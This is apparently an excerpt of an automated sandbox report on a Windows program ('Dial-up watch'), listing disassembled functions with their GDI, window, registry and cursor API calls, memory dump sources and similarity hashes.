Part of subcall function 0040E380: RegCloseKey.ADVAPI32(?), ref: 0040E479

Strings

%d,%d,%d,%d, xrefs: 0040E09C
Settings\Window\, xrefs: 0040E0E8

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: MessageSend$CloseCreateValuelstrlen
String ID: %d,%d,%d,%d$Settings\Window\
API String ID: 1956160522-4254346116
Opcode ID: f4df0ba5ed9feeeac000da502e0f50e2c89a41c1e00ffed2c2b60136304e557a
Instruction ID: f198e6b2ccf21bd4e2e9ed21465bc2e18785a7b1bdaf2b4ff38409dcbceb7216
Opcode Fuzzy Hash: f4df0ba5ed9feeeac000da502e0f50e2c89a41c1e00ffed2c2b60136304e557a
Instruction Fuzzy Hash: 1E21C771344340BBD230DB59DC42F5BB7E8AF89B10F104A1EF584A72C1D7B964044B66

Function 0044E18B Relevance: 9.2, APIs: 6, Instructions: 182COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044E190
GetDC.USER32(?), ref: 0044E27F
ReleaseDC.USER32(?,?), ref: 0044E2B3
GetDeviceCaps.GDI32(?,00000058), ref: 0044E2CC
GetDeviceCaps.GDI32(?,0000005A), ref: 0044E2DC

Part of subcall function 0044FC28: __EH_prolog.LIBCMT ref: 0044FC2D

ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,0045A560,0045A560), ref: 0044E3A4

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: CapsDeviceH_prolog$ReleaseScrollShow
String ID:
API String ID: 603669091-0
Opcode ID: 090dae0172aeb17e12b8c21daeddc03a31877f65ae702c0e2fcb3792e6b048a7
Instruction ID: 7fb213bebbe4ff4ae083d0faa5ad415e0fa1a3827927269174669a1d0814acce
Opcode Fuzzy Hash: 090dae0172aeb17e12b8c21daeddc03a31877f65ae702c0e2fcb3792e6b048a7
Instruction Fuzzy Hash: E4715B70600A00DFD729DF69C484AAABBF5FF48710F10456EE56ACB3A1DB35E845DB14

Function 00909E20 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 337COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 00909F75
GetCurrentProcess.KERNEL32(00000000), ref: 00909F78
GetCurrentProcess.KERNEL32(00000000), ref: 00909F7B

Strings

:3K0, xrefs: 0090A183
K<n(, xrefs: 0090A114

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: :3K0$K<n(
API String ID: 2050909247-2412546189
Opcode ID: 64efa3545465ec71fc3aac365a4ff52a5d55b634fc189517696cbcb6de816fea
Instruction ID: 05483dfbb461062860edc2266046f3766ef5ad5ee2c7b1f81590e659a022f26d
Opcode Fuzzy Hash: 64efa3545465ec71fc3aac365a4ff52a5d55b634fc189517696cbcb6de816fea
Instruction Fuzzy Hash: B7B1A070B183018FDA64EFB4D951B2F72EAABC8B40F14892AF549CB3D1DA34DD059792

Function 0044408E Relevance: 9.1, APIs: 6, Instructions: 79COMMON

Download Yara Rule

APIs

CopyRect.USER32(?,?), ref: 004440A4
FillRect.USER32(?,?,?), ref: 004440CC
FillRect.USER32(?,?,?), ref: 004440EF
CopyRect.USER32(?,?), ref: 004440F8
FillRect.USER32(?,?,?), ref: 00444120
FillRect.USER32(?,?,?), ref: 00444142

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: Rect$Fill$Copy
String ID:
API String ID: 4194453840-0
Opcode ID: 5cba59cb74723318f4233a30f7f61c094d17f44323e180a96e84b4fd5bb7f51e
Instruction ID: 5f3e40bf0a3402f7b7c04466473a5ea4cf568e144611df9368285c10ee8f7bc4
Opcode Fuzzy Hash: 5cba59cb74723318f4233a30f7f61c094d17f44323e180a96e84b4fd5bb7f51e
Instruction Fuzzy Hash: 573167B5A0021AAFDF01CFA9CD85DAEBBF8FF08354B048566B918D7211D730E954DB94

Function 004060C0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000003,?,0000000A), ref: 004060D9
MulDiv.KERNEL32(00000007,?,0000000A), ref: 004060EC
MulDiv.KERNEL32(00000003,?,0000000A), ref: 004060FF
MulDiv.KERNEL32(00000007,?,0000000A), ref: 00406115
MulDiv.KERNEL32(00000007,?,0000000A), ref: 00406132
MulDiv.KERNEL32(00000003,?,0000000A), ref: 00406148

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0727de7ce3e9d76baa5378a3f7edcedaf9f0d75af5127c44b02c0d4a9a5edcf8
Instruction ID: bb6404df36254403df8aae135200e927aface91335a7be00d5aa255dd14de4b0
Opcode Fuzzy Hash: 0727de7ce3e9d76baa5378a3f7edcedaf9f0d75af5127c44b02c0d4a9a5edcf8
Instruction Fuzzy Hash: 951182B2B983076EF314CE68CC92B7A77D9DBD4B01F04483AB254CB2C1D9A49C055B62

Function 00406020 Relevance: 9.1, APIs: 6, Instructions: 62COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000056,?,00000064), ref: 00406039
MulDiv.KERNEL32(0000000E,?,00000064), ref: 0040604C
MulDiv.KERNEL32(00000056,?,00000064), ref: 0040605F
MulDiv.KERNEL32(0000000E,?,00000064), ref: 00406075
MulDiv.KERNEL32(00000056,?,00000064), ref: 0040608F
MulDiv.KERNEL32(0000000E,?,00000064), ref: 004060A4

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344bf3163844c302cff09d96a9b06064cff882e42c00e7a454632a5920e4cea6
Instruction ID: a549dea027f1b1e634c947c5799fc03fc274ad1e161c203849f357d2fa2431aa
Opcode Fuzzy Hash: 344bf3163844c302cff09d96a9b06064cff882e42c00e7a454632a5920e4cea6
Instruction Fuzzy Hash: 84115E73B947472AF310CA68CC51B7B26DADB84B11F04083A7754DB2C2D9A588059B61

Function 0043A051 Relevance: 7.6, APIs: 5, Instructions: 118COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043A056

Part of subcall function 00438C2C: __EH_prolog.LIBCMT ref: 00438C31
Part of subcall function 00438C2C: GetWindowDC.USER32(?,?,?,0043A085,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00438C5A

Part of subcall function 004385CE: SetMapMode.GDI32(?,?), ref: 004385E7
Part of subcall function 004385CE: SetMapMode.GDI32(?,?), ref: 004385F5

LPtoDP.GDI32(?,?,00000001), ref: 0043A0AE
LPtoDP.GDI32(?,?,00000001), ref: 0043A0C6
LPtoDP.GDI32(?,?,00000001), ref: 0043A0DE
InvalidateRect.USER32(?,00000000,00000001), ref: 0043A16C

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: H_prologMode$InvalidateRectWindow
String ID:
API String ID: 2422810626-0
Opcode ID: 87c31eb13c5a8f027849554b8135fff1cb61ce0f2a429f49fc652c9f9a697ca2
Instruction ID: 51a93006b1ac1e00985406cacf70c8d84a2f86f71370cb4308d9c2832eff6b09
Opcode Fuzzy Hash: 87c31eb13c5a8f027849554b8135fff1cb61ce0f2a429f49fc652c9f9a697ca2
Instruction Fuzzy Hash: 43411470640B189FCB24DF6AC880A9AF7F5FF48314F10982EE58697760D7B5E851CB14

Function 0044604B Relevance: 7.6, APIs: 5, Instructions: 68windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000,00000000), ref: 00446067
GetParent.USER32(?), ref: 00446075
GetActiveWindow.USER32 ref: 004460C1
SendMessageA.USER32(?,00000006,00000001,00000000), ref: 004460D2
SendMessageA.USER32(?,00000086,00000001,00000000), ref: 004460E7

Part of subcall function 00433955: EnableWindow.USER32(?,?), ref: 00433963

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: MessageSendWindow$ActiveEnableFocusParent
String ID:
API String ID: 3951091596-0
Opcode ID: 3d53444c90dff63ffee1f5910845a97f5895adafd42e4e3623eee19a3a433458
Instruction ID: 5673615c3ea81d2f0a4b94e716d146e0ca65c82f4c530a0880636225ebd89c16
Opcode Fuzzy Hash: 3d53444c90dff63ffee1f5910845a97f5895adafd42e4e3623eee19a3a433458
Instruction Fuzzy Hash: B811D3712007009BE7309F65DC88B2B77E9AF46715F12462EF6869A2D2CB79AC40870E

Function 00446101 Relevance: 7.6, APIs: 5, Instructions: 65windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00446157
SendMessageA.USER32(?,00000086,00000000,00000000), ref: 0044616B
GetDesktopWindow.USER32 ref: 0044616F
GetWindow.USER32(00000000), ref: 0044617C
SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 0044619D

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: MessageSendWindow$DesktopLong
String ID:
API String ID: 2272707703-0
Opcode ID: fb7c0828918217cef8807b0c2d604bbafa39549e276f42536ae88de2fba4f711
Instruction ID: db9ec3f9ee440c7447606ea4cf66986b61443c5de84ac64ef540d90fcbccb865
Opcode Fuzzy Hash: fb7c0828918217cef8807b0c2d604bbafa39549e276f42536ae88de2fba4f711
Instruction Fuzzy Hash: C41159312407113BF7321A218C12F2FBA459F47B55F16412AF6401A2E3CE59DC01869F

Function 00448065 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?,?,?,?,?,?,004148E4,?,00000000,?,?,?,?,?,?,?), ref: 00448075
GetDeviceCaps.GDI32(?,00000058), ref: 004480AF
GetDeviceCaps.GDI32(?,0000005A), ref: 004480B8

Part of subcall function 00438B0F: GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 00438B20
Part of subcall function 00438B0F: GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 00438B2D
Part of subcall function 00438B0F: MulDiv.KERNEL32(?,00000000,00000000), ref: 00438B52
Part of subcall function 00438B0F: MulDiv.KERNEL32(00000002,00000000,00000000), ref: 00438B6D

MulDiv.KERNEL32(?,000009EC,00000060), ref: 004480DC
MulDiv.KERNEL32(00000002,000009EC,?), ref: 004480E7

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: CapsDevice$ModeViewportWindow
String ID:
API String ID: 2598972148-0
Opcode ID: dd96e22100dfa93b67ee38670ca722714832148f0f86229c2da9e7fc5ce7beda
Instruction ID: c3000c36b0a4cfcd82065a020ca040506e45e036f45b60e29bbf7084e53bae44
Opcode Fuzzy Hash: dd96e22100dfa93b67ee38670ca722714832148f0f86229c2da9e7fc5ce7beda
Instruction Fuzzy Hash: 9B11AC71600A04AFEB21AF59CC44C2EBBE9EF88751B12402EF94697361DBB2AC41CF55

Function 004480F3 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,00414918,?,?,?,?,?,?,00000000,00000000), ref: 00448103
GetDeviceCaps.GDI32(?,00000058), ref: 0044813D
GetDeviceCaps.GDI32(?,0000005A), ref: 00448146

Part of subcall function 00438AA6: GetWindowExtEx.GDI32(?,00414918,00000000,?,?,?,00414918,?,?,?,?,?,?,00000000,00000000), ref: 00438AB7
Part of subcall function 00438AA6: GetViewportExtEx.GDI32(?,?,?,00414918,?,?,?,?,?,?,00000000,00000000), ref: 00438AC4
Part of subcall function 00438AA6: MulDiv.KERNEL32(00414918,00000000,00000000), ref: 00438AE9
Part of subcall function 00438AA6: MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 00438B04

MulDiv.KERNEL32(00414918,00000060,000009EC), ref: 0044816A
MulDiv.KERNEL32(46892C46,?,000009EC), ref: 00448175

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: CapsDevice$ModeViewportWindow
String ID:
API String ID: 2598972148-0
Opcode ID: 57f81895dfae2b9d25cc4b64127cb6cd0e2e07dd2978c01cd0c286df586b81ef
Instruction ID: 695f9fdec1947423f405175aaa9be44b7dff7c24dc14e02b7496eb67d8368267
Opcode Fuzzy Hash: 57f81895dfae2b9d25cc4b64127cb6cd0e2e07dd2978c01cd0c286df586b81ef
Instruction Fuzzy Hash: AD11A031600600AFE7116F55CC44C2EBBB9EF88751B11442FF98697360DB75EC428F54

Function 0040E120 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000002,00000000,00000000), ref: 0040E18E
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?), ref: 0040E1D2
RegCloseKey.ADVAPI32(?), ref: 0040E1F3

Strings

Software\Josefsson\Dial-up watch\, xrefs: 0040E143

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: CloseCreateQueryValue
String ID: Software\Josefsson\Dial-up watch\
API String ID: 4083198587-374613065
Opcode ID: 10db0699cb073ee65770c267009bf50df89b9d9f44ded71e7465f6d9897b799c
Instruction ID: 1df0cd90653c7cfea78a78e3fb4338adf016baa1377765e8027aa9520124f563
Opcode Fuzzy Hash: 10db0699cb073ee65770c267009bf50df89b9d9f44ded71e7465f6d9897b799c
Instruction Fuzzy Hash: EB3183B42083819ED324DF54D451BAFB7E8EBD4708F80492DF68543282DB78A50CCB6B

Function 00448181 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B56B: EnterCriticalSection.KERNEL32(0046D470,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5A6
Part of subcall function 0044B56B: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5B8
Part of subcall function 0044B56B: LeaveCriticalSection.KERNEL32(0046D470,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5C1
Part of subcall function 0044B56B: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113,0043427A), ref: 0044B5D3

CreateBitmap.GDI32(00000008,00000008,00000001,00000001,5!D), ref: 004481C0
CreatePatternBrush.GDI32(00000000), ref: 004481CD
DeleteObject.GDI32(00000000), ref: 004481D9

Strings

5!D, xrefs: 0044819A, 004481B4, 004481B7

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: CriticalSection$CreateEnter$BitmapBrushDeleteInitializeLeaveObjectPattern
String ID: 5!D
API String ID: 3767330792-550465027
Opcode ID: 9ad69d31128bbfa82dd4b0e2b817d25f44f4e478a9fa2de729bd61a15917bba5
Instruction ID: 9c2335d3ac1647ac1722f80fa25989d35d65ac4a73b2c60fd1cb5489864e98a2
Opcode Fuzzy Hash: 9ad69d31128bbfa82dd4b0e2b817d25f44f4e478a9fa2de729bd61a15917bba5
Instruction Fuzzy Hash: A0F0C871A40F0066F750A7698C56B6E72A6EBC4B06F10403FFA46962E1EEB48446875E

Function 008E21A0 Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 008E21F9
SetLastError.KERNEL32(0000007E), ref: 008E223B

Memory Dump Source

Source File: 00000002.00000002.2728197966.00000000008E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 008E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8e1000_provthrd.jbxd

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: f14d14f902100ba83bc1ef5ce5d90e9c1686051329c0b68d52a660f30d59db69
Instruction ID: b729544531c13303e155073c9abd6b05152b1eac822461814d142f0bfd84dce5
Opcode Fuzzy Hash: f14d14f902100ba83bc1ef5ce5d90e9c1686051329c0b68d52a660f30d59db69
Instruction Fuzzy Hash: 8C81B974A00249EFDB04CF95C895AAEB7B5FF49314F248158E909AB355C774AE81CF90

Function 00442109 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000000), ref: 0044211F

Part of subcall function 00448181: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,5!D), ref: 004481C0
Part of subcall function 00448181: CreatePatternBrush.GDI32(00000000), ref: 004481CD
Part of subcall function 00448181: DeleteObject.GDI32(00000000), ref: 004481D9

GetSystemMetrics.USER32(00000020), ref: 00442165
GetSystemMetrics.USER32(00000021), ref: 0044216D
InflateRect.USER32(?,000000FF,000000FF), ref: 004421C3

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: CreateMetricsObjectSystem$BitmapBrushDeleteInflatePatternRectStock
String ID:
API String ID: 419749085-0
Opcode ID: bed477b53b59c011b776d41847b8f29fae9eff25c806e38322cc4df037e7a258
Instruction ID: c105ea4a06f0798c8c939aaf0cbf72fdfd36e74f9c1ee66e0d92e766a27f890f
Opcode Fuzzy Hash: bed477b53b59c011b776d41847b8f29fae9eff25c806e38322cc4df037e7a258
Instruction Fuzzy Hash: AB417E71D006199BDF11CFA4C984A9EB7F1AF09310F5142A6FE10BB295C3B5AE41CF94

Function 0044E0BE Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044E0C3
LoadCursorA.USER32(00000000,00007F00), ref: 0044E12D
SetCursor.USER32(00000000), ref: 0044E134
DestroyCursor.USER32(00000000), ref: 0044E13C

Part of subcall function 0044FCB0: __EH_prolog.LIBCMT ref: 0044FCB5
Part of subcall function 0044FCB0: DeleteDC.GDI32(?), ref: 0044FCD6

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: Cursor$H_prolog$DeleteDestroyLoad
String ID:
API String ID: 2398634004-0
Opcode ID: 62ca1bf25763427b5a679e574110685af601d598c3a2f82c08f3327d41f0bee1
Instruction ID: 9fd7be31fa46b5bc1478abccb362ca97a80f4a121d3019c6d524b47b2a7275c3
Opcode Fuzzy Hash: 62ca1bf25763427b5a679e574110685af601d598c3a2f82c08f3327d41f0bee1
Instruction Fuzzy Hash: EA11E031200B10DBE715AB25D8067AEB7B5BF44705F40442EE06697292CFB86844CB18

Function 004420C0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

